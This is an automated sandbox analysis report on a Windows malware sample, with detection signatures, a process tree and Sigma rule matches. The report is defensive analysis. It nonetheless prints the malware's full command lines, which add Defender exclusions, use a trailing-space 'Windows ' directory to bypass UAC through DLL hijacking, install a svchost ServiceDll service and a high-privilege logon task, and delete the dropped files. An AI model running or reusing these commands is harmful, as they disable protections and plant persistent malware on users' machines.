Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pyld611114.exe

Overview

General Information

Sample name:pyld611114.exe
Analysis ID:1577366
MD5:43bce45d873189f9ae2767d89a1c46e0
SHA1:34bc871a24e54a83740e0df51320b9836d8b820b
SHA256:9ae4784f0b139619ca8fdadfa31b53b1cbf7cd2b45f74b7e4004e5a97e842291
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • pyld611114.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\pyld611114.exe" MD5: 43BCE45D873189F9AE2767D89A1C46E0)
    • cmd.exe (PID: 7644 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7696 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3384 cmdline: cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • usvcinsta64.exe (PID: 4900 cmdline: "C:\Windows\System32\usvcinsta64.exe" MD5: 11DDC0A34BAC7AB099D2EE8D9817BF58)
        • cmd.exe (PID: 1976 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7432 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 5704 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5728 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7824 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5292 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • printui.exe (PID: 7644 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
            • cmd.exe (PID: 7780 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7928 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 7568 cmdline: cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 6408 cmdline: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 404 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • sc.exe (PID: 1976 cmdline: sc start x816796 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • cmd.exe (PID: 6908 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • console_zero.exe (PID: 5036 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
                • cmd.exe (PID: 2084 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 6892 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • cmd.exe (PID: 3328 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 1484 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 7696 cmdline: cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 2532 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 7652 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7924 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 2136 cmdline: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 6136 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 3164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3320 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 8152 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7188 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 8100 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2536 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5256 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2828 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 4784 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 7560 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 8156 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 8096 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 6332 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 3700 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 7116 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 4144 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
    • cmd.exe (PID: 936 cmdline: cmd.exe /c start "" "c:\windows\system32\crypti.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crypti.exe (PID: 6032 cmdline: "c:\windows\system32\crypti.exe" MD5: D8C562EEBC88199B8D0E7274782C531D)
  • console_zero.exe (PID: 4064 cmdline: C:\Windows\System32\console_zero.exe MD5: 74CF33F8C2FCB56F749AAF411B9AE302)
    • cmd.exe (PID: 8012 cmdline: cmd.exe /c schtasks /delete /tn "console_zero" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8076 cmdline: schtasks /delete /tn "console_zero" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4236 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2096 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: TrustedPath UAC Bypass Pattern
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5292, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 7644, ProcessName: printui.exe
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Windows\System32\usvcinsta64.exe, ProcessId: 4900, TargetFilename: C:\Windows \System32\printui.dll
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 5036, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 3328, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 5036, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 3328, ProcessName: cmd.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\pyld611114.exe", ParentImage: C:\Users\user\Desktop\pyld611114.exe, ParentProcessId: 7528, ParentProcessName: pyld611114.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 7644, ProcessName: cmd.exe
Sigma detected: Suspicious New Service Creation
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6408, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\pyld611114.exe", ParentImage: C:\Users\user\Desktop\pyld611114.exe, ParentProcessId: 7528, ParentProcessName: pyld611114.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 7644, ProcessName: cmd.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f && sc start x816796, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7568, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 6408, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7644, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 7696, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3164, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: pyld611114.exeAvira: detected
Antivirus detection for dropped file
Source: C:\Windows \System32\printui.dllAvira: detection malicious, Label: TR/Crypt.Agent.uguls
Source: C:\Windows\System32\x816796.datAvira: detection malicious, Label: TR/Agent.gjkfm
Source: C:\Windows\System32\usvcinsta64.exeAvira: detection malicious, Label: TR/AD.Nekark.jksvb
Source: C:\Windows\System32\console_zero.exeAvira: detection malicious, Label: TR/AVI.Agent.iscto
Multi AV Scanner detection for dropped file
Source: C:\Windows \System32\printui.dllReversingLabs: Detection: 75%
Source: C:\Windows\System32\console_zero.exeReversingLabs: Detection: 70%
Source: C:\Windows\System32\usvcinsta64.exeReversingLabs: Detection: 83%
Source: C:\Windows\System32\x816796.datReversingLabs: Detection: 70%
Multi AV Scanner detection for submitted file
Source: pyld611114.exeReversingLabs: Detection: 76%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Windows\System32\x816796.datJoe Sandbox ML: detected
Machine Learning detection for sample
Source: pyld611114.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36142D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,42_2_00007FFDA36142D0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3612F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,42_2_00007FFDA3612F50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36023C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36023C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624380
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3620450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,42_2_00007FFDA3620450
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,42_2_00007FFDA368844C
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3688426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,42_2_00007FFDA3688426
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3688414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,42_2_00007FFDA3688414
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3638400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,42_2_00007FFDA3638400
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36423F0 CRYPTO_free,42_2_00007FFDA36423F0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36062C0 CRYPTO_clear_free,42_2_00007FFDA36062C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA362C2C0 CRYPTO_free,42_2_00007FFDA362C2C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36802C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,42_2_00007FFDA36802C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA364A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,42_2_00007FFDA364A2C0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36102B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,42_2_00007FFDA36102B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3624260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,42_2_00007FFDA3624260
